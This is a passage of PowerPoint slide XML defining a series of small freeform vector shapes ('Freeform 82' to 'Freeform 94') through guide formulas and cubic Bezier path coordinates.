                <a:gd name="T21" fmla="*/ 25 h 26"/>
                <a:gd name="T22" fmla="*/ 3 w 20"/>
                <a:gd name="T23" fmla="*/ 26 h 26"/>
                <a:gd name="T24" fmla="*/ 2 w 20"/>
                <a:gd name="T2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6">
                  <a:moveTo>
                    <a:pt x="2" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="26"/>
                    <a:pt x="1" y="26"/>
                    <a:pt x="1" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="1" y="24"/>
                    <a:pt x="1" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1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6" y="14"/>
                    <a:pt x="10" y="8"/>
                    <a:pt x="17" y="1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20" y="1"/>
                    <a:pt x="20" y="2"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="10"/>
                    <a:pt x="9" y="16"/>
                    <a:pt x="5" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="24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2" y="26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3" name="Freeform 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3925888" y="5213351"/>
              <a:ext cx="134938" cy="187325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 18"/>
                <a:gd name="T1" fmla="*/ 25 h 25"/>
                <a:gd name="T2" fmla="*/ 1 w 18"/>
                <a:gd name="T3" fmla="*/ 24 h 25"/>
                <a:gd name="T4" fmla="*/ 0 w 18"/>
                <a:gd name="T5" fmla="*/ 22 h 25"/>
                <a:gd name="T6" fmla="*/ 15 w 18"/>
                <a:gd name="T7" fmla="*/ 0 h 25"/>
                <a:gd name="T8" fmla="*/ 17 w 18"/>
                <a:gd name="T9" fmla="*/ 0 h 25"/>
                <a:gd name="T10" fmla="*/ 18 w 18"/>
                <a:gd name="T11" fmla="*/ 2 h 25"/>
                <a:gd name="T12" fmla="*/ 3 w 18"/>
                <a:gd name="T13" fmla="*/ 24 h 25"/>
                <a:gd name="T14" fmla="*/ 2 w 18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25">
                  <a:moveTo>
                    <a:pt x="2" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="25"/>
                    <a:pt x="1" y="25"/>
                    <a:pt x="1" y="24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5" y="15"/>
                    <a:pt x="10" y="7"/>
                    <a:pt x="15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8" y="1"/>
                    <a:pt x="18" y="2"/>
                    <a:pt x="18" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="9"/>
                    <a:pt x="7" y="16"/>
                    <a:pt x="3" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="24"/>
                    <a:pt x="2" y="25"/>
                    <a:pt x="2" y="25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4" name="Freeform 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3933825" y="5303838"/>
              <a:ext cx="134938" cy="209550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 18"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 1 w 18"/>
                <a:gd name="T3" fmla="*/ 28 h 28"/>
                <a:gd name="T4" fmla="*/ 0 w 18"/>
                <a:gd name="T5" fmla="*/ 26 h 28"/>
                <a:gd name="T6" fmla="*/ 1 w 18"/>
                <a:gd name="T7" fmla="*/ 24 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 18"/>
                <a:gd name="T9" fmla="*/ 1 h 28"/>
                <a:gd name="T10" fmla="*/ 17 w 18"/>
                <a:gd name="T11" fmla="*/ 1 h 28"/>
                <a:gd name="T12" fmla="*/ 17 w 18"/>
                <a:gd name="T13" fmla="*/ 3 h 28"/>
                <a:gd name="T14" fmla="*/ 3 w 18"/>
                <a:gd name="T15" fmla="*/ 25 h 28"/>
                <a:gd name="T16" fmla="*/ 3 w 18"/>
                <a:gd name="T17" fmla="*/ 25 h 28"/>
                <a:gd name="T18" fmla="*/ 3 w 18"/>
                <a:gd name="T19" fmla="*/ 27 h 28"/>
                <a:gd name="T20" fmla="*/ 2 w 18"/>
                <a:gd name="T2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28">
                  <a:moveTo>
                    <a:pt x="2" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="28"/>
                    <a:pt x="1" y="28"/>
                    <a:pt x="1" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="27"/>
                    <a:pt x="0" y="27"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="24"/>
                    <a:pt x="1" y="24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0"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="1"/>
                    <a:pt x="18" y="2"/>
                    <a:pt x="17" y="3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8"/>
                    <a:pt x="2" y="28"/>
                    <a:pt x="2" y="28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5" name="Freeform 84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3933825" y="5422901"/>
              <a:ext cx="149225" cy="217488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 20"/>
                <a:gd name="T1" fmla="*/ 29 h 29"/>
                <a:gd name="T2" fmla="*/ 1 w 20"/>
                <a:gd name="T3" fmla="*/ 29 h 29"/>
                <a:gd name="T4" fmla="*/ 0 w 20"/>
                <a:gd name="T5" fmla="*/ 27 h 29"/>
                <a:gd name="T6" fmla="*/ 13 w 20"/>
                <a:gd name="T7" fmla="*/ 5 h 29"/>
                <a:gd name="T8" fmla="*/ 17 w 20"/>
                <a:gd name="T9" fmla="*/ 1 h 29"/>
                <a:gd name="T10" fmla="*/ 19 w 20"/>
                <a:gd name="T11" fmla="*/ 1 h 29"/>
                <a:gd name="T12" fmla="*/ 18 w 20"/>
                <a:gd name="T13" fmla="*/ 3 h 29"/>
                <a:gd name="T14" fmla="*/ 15 w 20"/>
                <a:gd name="T15" fmla="*/ 7 h 29"/>
                <a:gd name="T16" fmla="*/ 3 w 20"/>
                <a:gd name="T17" fmla="*/ 28 h 29"/>
                <a:gd name="T18" fmla="*/ 1 w 20"/>
                <a:gd name="T1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9">
                  <a:moveTo>
                    <a:pt x="1" y="29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5" y="2"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="2"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="4"/>
                    <a:pt x="16" y="5"/>
                    <a:pt x="15" y="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9"/>
                    <a:pt x="2" y="29"/>
                    <a:pt x="1" y="29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6" name="Freeform 85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3941763" y="5541963"/>
              <a:ext cx="141288" cy="195263"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 19"/>
                <a:gd name="T1" fmla="*/ 26 h 26"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 26 h 26"/>
                <a:gd name="T4" fmla="*/ 0 w 19"/>
                <a:gd name="T5" fmla="*/ 24 h 26"/>
                <a:gd name="T6" fmla="*/ 9 w 19"/>
                <a:gd name="T7" fmla="*/ 10 h 26"/>
                <a:gd name="T8" fmla="*/ 16 w 19"/>
                <a:gd name="T9" fmla="*/ 0 h 26"/>
                <a:gd name="T10" fmla="*/ 18 w 19"/>
                <a:gd name="T11" fmla="*/ 0 h 26"/>
                <a:gd name="T12" fmla="*/ 19 w 19"/>
                <a:gd name="T13" fmla="*/ 2 h 26"/>
                <a:gd name="T14" fmla="*/ 12 w 19"/>
                <a:gd name="T15" fmla="*/ 12 h 26"/>
                <a:gd name="T16" fmla="*/ 3 w 19"/>
                <a:gd name="T17" fmla="*/ 25 h 26"/>
                <a:gd name="T18" fmla="*/ 1 w 19"/>
                <a:gd name="T1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26">
                  <a:moveTo>
                    <a:pt x="1" y="26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4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="20"/>
                    <a:pt x="6" y="15"/>
                    <a:pt x="9" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="7"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="17" y="0"/>
                    <a:pt x="18" y="0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17" y="5"/>
                    <a:pt x="14" y="8"/>
                    <a:pt x="12" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="17"/>
                    <a:pt x="5" y="21"/>
                    <a:pt x="3" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="26"/>
                    <a:pt x="2" y="26"/>
                    <a:pt x="1" y="26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7" name="Freeform 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3925888" y="5648326"/>
              <a:ext cx="142875" cy="193675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 19"/>
                <a:gd name="T1" fmla="*/ 26 h 26"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 26 h 26"/>
                <a:gd name="T4" fmla="*/ 1 w 19"/>
                <a:gd name="T5" fmla="*/ 24 h 26"/>
                <a:gd name="T6" fmla="*/ 6 w 19"/>
                <a:gd name="T7" fmla="*/ 15 h 26"/>
                <a:gd name="T8" fmla="*/ 16 w 19"/>
                <a:gd name="T9" fmla="*/ 1 h 26"/>
                <a:gd name="T10" fmla="*/ 18 w 19"/>
                <a:gd name="T11" fmla="*/ 1 h 26"/>
                <a:gd name="T12" fmla="*/ 18 w 19"/>
                <a:gd name="T13" fmla="*/ 3 h 26"/>
                <a:gd name="T14" fmla="*/ 9 w 19"/>
                <a:gd name="T15" fmla="*/ 17 h 26"/>
                <a:gd name="T16" fmla="*/ 3 w 19"/>
                <a:gd name="T17" fmla="*/ 26 h 26"/>
                <a:gd name="T18" fmla="*/ 2 w 19"/>
                <a:gd name="T1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26">
                  <a:moveTo>
                    <a:pt x="2" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="26"/>
                    <a:pt x="1" y="26"/>
                    <a:pt x="1" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="26"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="1" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="21"/>
                    <a:pt x="5" y="18"/>
                    <a:pt x="6" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="11"/>
                    <a:pt x="12" y="6"/>
                    <a:pt x="16" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="17" y="0"/>
                    <a:pt x="18" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="8"/>
                    <a:pt x="12" y="12"/>
                    <a:pt x="9" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="20"/>
                    <a:pt x="5" y="23"/>
                    <a:pt x="3" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="26"/>
                    <a:pt x="2" y="26"/>
                    <a:pt x="2" y="26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Freeform 87"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3948113" y="5745163"/>
              <a:ext cx="127000" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 17"/>
                <a:gd name="T1" fmla="*/ 18 h 18"/>
                <a:gd name="T2" fmla="*/ 3 w 17"/>
                <a:gd name="T3" fmla="*/ 18 h 18"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 17 h 18"/>
                <a:gd name="T6" fmla="*/ 4 w 17"/>
                <a:gd name="T7" fmla="*/ 15 h 18"/>
                <a:gd name="T8" fmla="*/ 4 w 17"/>
                <a:gd name="T9" fmla="*/ 15 h 18"/>
                <a:gd name="T10" fmla="*/ 14 w 17"/>
                <a:gd name="T11" fmla="*/ 1 h 18"/>
                <a:gd name="T12" fmla="*/ 16 w 17"/>
                <a:gd name="T13" fmla="*/ 0 h 18"/>
                <a:gd name="T14" fmla="*/ 16 w 17"/>
                <a:gd name="T15" fmla="*/ 2 h 18"/>
                <a:gd name="T16" fmla="*/ 7 w 17"/>
                <a:gd name="T17" fmla="*/ 16 h 18"/>
                <a:gd name="T18" fmla="*/ 7 w 17"/>
                <a:gd name="T19" fmla="*/ 16 h 18"/>
                <a:gd name="T20" fmla="*/ 6 w 17"/>
                <a:gd name="T21" fmla="*/ 17 h 18"/>
                <a:gd name="T22" fmla="*/ 3 w 17"/>
                <a:gd name="T2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8">
                  <a:moveTo>
                    <a:pt x="3" y="18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2" y="18"/>
                    <a:pt x="0" y="18"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15"/>
                    <a:pt x="1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1"/>
                    <a:pt x="17" y="2"/>
                    <a:pt x="16" y="2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7"/>
                    <a:pt x="7" y="17"/>
                    <a:pt x="6" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="18"/>
                    <a:pt x="3" y="18"/>
                    <a:pt x="3" y="18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Freeform 88"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4329113" y="4816476"/>
              <a:ext cx="157163" cy="239713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 21"/>
                <a:gd name="T1" fmla="*/ 32 h 32"/>
                <a:gd name="T2" fmla="*/ 1 w 21"/>
                <a:gd name="T3" fmla="*/ 31 h 32"/>
                <a:gd name="T4" fmla="*/ 0 w 21"/>
                <a:gd name="T5" fmla="*/ 29 h 32"/>
                <a:gd name="T6" fmla="*/ 9 w 21"/>
                <a:gd name="T7" fmla="*/ 15 h 32"/>
                <a:gd name="T8" fmla="*/ 18 w 21"/>
                <a:gd name="T9" fmla="*/ 1 h 32"/>
                <a:gd name="T10" fmla="*/ 20 w 21"/>
                <a:gd name="T11" fmla="*/ 1 h 32"/>
                <a:gd name="T12" fmla="*/ 20 w 21"/>
                <a:gd name="T13" fmla="*/ 3 h 32"/>
                <a:gd name="T14" fmla="*/ 12 w 21"/>
                <a:gd name="T15" fmla="*/ 17 h 32"/>
                <a:gd name="T16" fmla="*/ 3 w 21"/>
                <a:gd name="T17" fmla="*/ 31 h 32"/>
                <a:gd name="T18" fmla="*/ 2 w 21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" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="32"/>
                    <a:pt x="1" y="32"/>
                    <a:pt x="1" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="30"/>
                    <a:pt x="0" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="25"/>
                    <a:pt x="6" y="20"/>
                    <a:pt x="9" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="10"/>
                    <a:pt x="15" y="5"/>
                    <a:pt x="18" y="1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1" y="2"/>
                    <a:pt x="20" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="7"/>
                    <a:pt x="15" y="12"/>
                    <a:pt x="12" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="22"/>
                    <a:pt x="6" y="27"/>
                    <a:pt x="3" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="31"/>
                    <a:pt x="2" y="32"/>
                    <a:pt x="2" y="32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0" name="Freeform 89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4337050" y="4981576"/>
              <a:ext cx="141288" cy="209550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 19"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 28 h 28"/>
                <a:gd name="T4" fmla="*/ 0 w 19"/>
                <a:gd name="T5" fmla="*/ 26 h 28"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 1 h 28"/>
                <a:gd name="T8" fmla="*/ 18 w 19"/>
                <a:gd name="T9" fmla="*/ 1 h 28"/>
                <a:gd name="T10" fmla="*/ 18 w 19"/>
                <a:gd name="T11" fmla="*/ 3 h 28"/>
                <a:gd name="T12" fmla="*/ 5 w 19"/>
                <a:gd name="T13" fmla="*/ 24 h 28"/>
                <a:gd name="T14" fmla="*/ 5 w 19"/>
                <a:gd name="T15" fmla="*/ 24 h 28"/>
                <a:gd name="T16" fmla="*/ 5 w 19"/>
                <a:gd name="T17" fmla="*/ 27 h 28"/>
                <a:gd name="T18" fmla="*/ 2 w 19"/>
                <a:gd name="T19" fmla="*/ 28 h 28"/>
                <a:gd name="T20" fmla="*/ 2 w 19"/>
                <a:gd name="T2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8">
                  <a:moveTo>
                    <a:pt x="2" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="28"/>
                    <a:pt x="1" y="28"/>
                    <a:pt x="1" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="0" y="26"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="18"/>
                    <a:pt x="11" y="9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ubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="10"/>
                    <a:pt x="9" y="17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6" y="25"/>
                    <a:pt x="5" y="26"/>
                    <a:pt x="5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1" name="Freeform 90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4329113" y="5086351"/>
              <a:ext cx="157163" cy="187325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 21"/>
                <a:gd name="T1" fmla="*/ 25 h 25"/>
                <a:gd name="T2" fmla="*/ 1 w 21"/>
                <a:gd name="T3" fmla="*/ 24 h 25"/>
                <a:gd name="T4" fmla="*/ 1 w 21"/>
                <a:gd name="T5" fmla="*/ 22 h 25"/>
                <a:gd name="T6" fmla="*/ 7 w 21"/>
                <a:gd name="T7" fmla="*/ 15 h 25"/>
                <a:gd name="T8" fmla="*/ 18 w 21"/>
                <a:gd name="T9" fmla="*/ 1 h 25"/>
                <a:gd name="T10" fmla="*/ 20 w 21"/>
                <a:gd name="T11" fmla="*/ 1 h 25"/>
                <a:gd name="T12" fmla="*/ 20 w 21"/>
                <a:gd name="T13" fmla="*/ 3 h 25"/>
                <a:gd name="T14" fmla="*/ 9 w 21"/>
                <a:gd name="T15" fmla="*/ 17 h 25"/>
                <a:gd name="T16" fmla="*/ 5 w 21"/>
                <a:gd name="T17" fmla="*/ 21 h 25"/>
                <a:gd name="T18" fmla="*/ 5 w 21"/>
                <a:gd name="T19" fmla="*/ 23 h 25"/>
                <a:gd name="T20" fmla="*/ 3 w 21"/>
                <a:gd name="T21" fmla="*/ 24 h 25"/>
                <a:gd name="T22" fmla="*/ 2 w 21"/>
                <a:gd name="T2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5">
                  <a:moveTo>
                    <a:pt x="2" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="25"/>
                    <a:pt x="1" y="25"/>
                    <a:pt x="1" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24"/>
                    <a:pt x="0" y="23"/>
                    <a:pt x="1" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="20"/>
                    <a:pt x="5" y="17"/>
                    <a:pt x="7" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="10"/>
                    <a:pt x="15" y="5"/>
                    <a:pt x="18" y="1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1" y="2"/>
                    <a:pt x="20" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="7"/>
                    <a:pt x="13" y="12"/>
                    <a:pt x="9" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="18"/>
                    <a:pt x="7" y="20"/>
                    <a:pt x="5" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="22"/>
                    <a:pt x="5" y="23"/>
                    <a:pt x="5" y="23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5"/>
                    <a:pt x="2" y="25"/>
                    <a:pt x="2" y="25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2" name="Freeform 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4344988" y="5191126"/>
              <a:ext cx="127000" cy="187325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 17"/>
                <a:gd name="T1" fmla="*/ 25 h 25"/>
                <a:gd name="T2" fmla="*/ 1 w 17"/>
                <a:gd name="T3" fmla="*/ 24 h 25"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 22 h 25"/>
                <a:gd name="T6" fmla="*/ 15 w 17"/>
                <a:gd name="T7" fmla="*/ 1 h 25"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 1 h 25"/>
                <a:gd name="T10" fmla="*/ 17 w 17"/>
                <a:gd name="T11" fmla="*/ 3 h 25"/>
                <a:gd name="T12" fmla="*/ 3 w 17"/>
                <a:gd name="T13" fmla="*/ 24 h 25"/>
                <a:gd name="T14" fmla="*/ 2 w 17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5">
                  <a:moveTo>
                    <a:pt x="2" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="25"/>
                    <a:pt x="1" y="25"/>
                    <a:pt x="1" y="24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4" y="15"/>
                    <a:pt x="9" y="8"/>
                    <a:pt x="15" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="1"/>
                    <a:pt x="16" y="0"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="1"/>
                    <a:pt x="17" y="2"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="10"/>
                    <a:pt x="7" y="17"/>
                    <a:pt x="3" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="24"/>
                    <a:pt x="2" y="25"/>
                    <a:pt x="2" y="25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3" name="Freeform 92"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4351338" y="5310188"/>
              <a:ext cx="142875" cy="203200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 19"/>
                <a:gd name="T1" fmla="*/ 27 h 27"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 27 h 27"/>
                <a:gd name="T4" fmla="*/ 1 w 19"/>
                <a:gd name="T5" fmla="*/ 25 h 27"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 1 h 27"/>
                <a:gd name="T8" fmla="*/ 18 w 19"/>
                <a:gd name="T9" fmla="*/ 1 h 27"/>
                <a:gd name="T10" fmla="*/ 18 w 19"/>
                <a:gd name="T11" fmla="*/ 3 h 27"/>
                <a:gd name="T12" fmla="*/ 3 w 19"/>
                <a:gd name="T13" fmla="*/ 26 h 27"/>
                <a:gd name="T14" fmla="*/ 2 w 19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7">
                  <a:moveTo>
                    <a:pt x="2" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="27"/>
                    <a:pt x="1" y="27"/>
                    <a:pt x="1" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="0" y="26"/>
                    <a:pt x="1" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="17"/>
                    <a:pt x="10" y="9"/>
                    <a:pt x="16" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="17" y="0"/>
                    <a:pt x="18" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="10"/>
                    <a:pt x="8" y="18"/>
                    <a:pt x="3" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="27"/>
                    <a:pt x="2" y="27"/>
                    <a:pt x="2" y="27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4" name="Freeform 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4351338" y="5445126"/>
              <a:ext cx="120650" cy="173038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 16"/>
                <a:gd name="T1" fmla="*/ 23 h 23"/>
                <a:gd name="T2" fmla="*/ 0 w 16"/>
                <a:gd name="T3" fmla="*/ 23 h 23"/>
                <a:gd name="T4" fmla="*/ 0 w 16"/>
                <a:gd name="T5" fmla="*/ 21 h 23"/>
                <a:gd name="T6" fmla="*/ 13 w 16"/>
                <a:gd name="T7" fmla="*/ 1 h 23"/>
                <a:gd name="T8" fmla="*/ 15 w 16"/>
                <a:gd name="T9" fmla="*/ 0 h 23"/>
                <a:gd name="T10" fmla="*/ 15 w 16"/>
                <a:gd name="T11" fmla="*/ 2 h 23"/>
                <a:gd name="T12" fmla="*/ 3 w 16"/>
                <a:gd name="T13" fmla="*/ 22 h 23"/>
                <a:gd name="T14" fmla="*/ 1 w 16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3">
                  <a:moveTo>
                    <a:pt x="1" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23"/>
                    <a:pt x="0" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="21"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="14"/>
                    <a:pt x="8" y="7"/>
                    <a:pt x="13" y="1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1"/>
                    <a:pt x="16" y="2"/>
                    <a:pt x="15" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="9"/>
                    <a:pt x="6" y="15"/>
                    <a:pt x="3" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="22"/>
                    <a:pt x="2" y="23"/>
                    <a:pt x="1" y="23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5" name="Freeform 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4359275" y="5557838"/>
              <a:ext cx="112713" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 15"/>
                <a:gd name="T1" fmla="*/ 21 h 21"/>
                <a:gd name="T2" fmla="*/ 1 w 15"/>
                <a:gd name="T3" fmla="*/ 21 h 21"/>
                <a:gd name="T4" fmla="*/ 0 w 15"/>
                <a:gd name="T5" fmla="*/ 19 h 21"/>
